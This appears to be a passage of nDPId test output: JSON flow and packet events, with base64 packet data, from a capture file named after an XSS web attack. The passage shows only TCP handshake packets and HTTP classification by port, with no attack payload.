-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VfhAAD4Gb9isEAABwKgKMtzKAFDNpCPqAAAAAKACchAZDgAAAgQFtAQCCAoBOnYSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3392,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347375388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3MqX5dxFzaQj66AScSBaVQAAAgQFtAQCCAoD5EeIATp2EgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":1499347375389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347375389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VflAAD4Gb9+sEAABwKgKMtzKAFDNpCPrl+XcRoAQAOX5WwAAAQEICgE6dhMD5EeI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347376638,"flow_last_seen":1499347376638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347376638,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3404,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1499347376638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376638,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EqdAAD4GsymsEAABwKgKMtzYAFCvXmXsAAAAAKACchD0CgAAAgQFtAQCCAoBOndLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":1499347376639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347376639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3NhWyE7Mr15l7aAScSACsAAAAgQFtAQCCAoD5EjBATp3SwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1499347376639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347376639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EqhAAD4GszCsEAABwKgKMtzYAFCvXmXtVshOzYAQAOWhtwAAAQEICgE6d0sD5EjB"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347379171,"flow_last_seen":1499347379171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347379171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1499347379171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NzVAAD4GjpusEAABwKgKMtzyAFA14k7xAAAAAKACchCB7wAAAgQFtAQCCAoBOnnEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1499347379171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347379171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3PK2Txs5NeJO8qAScSBiJwAAAgQFtAQCCAoD5Es6ATp5xAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":3,"flow_last_seen":1499347379172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347379172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NzZAAD4GjqKsEAABwKgKMtzyAFA14k7ytk8bOoAQAOUBLwAAAQEICgE6ecQD5Es6"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347380424,"flow_last_seen":1499347380424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347380424,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1499347380424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PTxAAD4GiJSsEAABwKgKMt0AAFCXo0fBAAAAAKACchAmFwAAAgQFtAQCCAoBOnr9AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1499347380424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347380424,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3QDrAYLNl6NHwqAScSBozwAAAgQFtAQCCAoD5ExzATp6\/QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3436,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1499347380425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347380425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PT1AAD4GiJusEAABwKgKMt0AAFCXo0fC6wGCzoAQAOUH1wAAAQEICgE6ev0D5Exz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347381694,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347381694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Vu9AAD4GbuGsEAABwKgKMt0OAFBD4SrUAAAAAKACchCVegAAAgQFtAQCCAoBOnw7AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347381694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Q7aUZP1Q+Eq1aAScSDWfAAAAgQFtAQCCAoD5E2xATp8OwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3448,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1499347381694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347381694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VvBAAD4GbuisEAABwKgKMt0OAFBD4SrV2lGT9oAQAOV1hAAAAQEICgE6fDsD5E2x"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347384186,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384186,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bHdAAD4GWVmsEAABwKgKMt0oAFALKxLdAAAAAKACchDjngAAAgQFtAQCCAoBOn6qAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1499347384186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347384186,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Sg6aAAMCysS3qAScSBWBQAAAgQFtAQCCAoD5FAgATp+qgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1499347384187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347384187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bHhAAD4GWWCsEAABwKgKMt0oAFALKxLeOmgADYAQAOX1DAAAAQEICgE6fqoD5FAg"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347254714,"flow_last_seen":1499347260689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347257224,"flow_last_seen":1499347262689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347258474,"flow_last_seen":1499347263689,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347259759,"flow_last_seen":1499347265691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347262289,"flow_last_seen":1499347267691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347263542,"flow_last_seen":1499347268692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347384721,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347385481,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347385481,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VSxAAD4GcKSsEAABwKgKMt02AFBQ3SrBAAAAAKACchCEtwAAAgQFtAQCCAoBOn\/tAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347385481,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3TZsZa1KUN0qwqAScSAWnwAAAgQFtAQCCAoD5FFjATp\/7QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1499347385481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347385481,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VS1AAD4GcKusEAABwKgKMt02AFBQ3SrCbGWtS4AQAOW1pQAAAQEICgE6f+4D5FFj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347386736,"flow_last_seen":1499347386736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347386736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1499347386736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85qBAAD4G3y+sEAABwKgKMt1EAFDnQGeHAAAAAKACchCwRQAAAgQFtAQCCAoBOoEnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1499347386736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347386736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3URBkoPY50BniKAScSCVOAAAAgQFtAQCCAoD5FKdATqBJwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3494,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1499347386737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347386737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05qFAAD4G3zasEAABwKgKMt1EAFDnQGeIQZKD2YAQAOU0PwAAAQEICgE6gSgD5FKd"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347389305,"flow_last_seen":1499347389305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347389305,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1499347389305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86AFAAD4G3c6sEAABwKgKMt1eAFBbbmurAAAAAKACchA1VwAAAgQFtAQCCAoBOoOqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1499347389305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3V4nyHcOW25rrKAScSA+XAAAAgQFtAQCCAoD5FUfATqDqgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1499347389306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347389306,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AJAAD4G3dWsEAABwKgKMt1eAFBbbmusJ8h3D4AQAOXdYwAAAQEICgE6g6oD5FUf"} 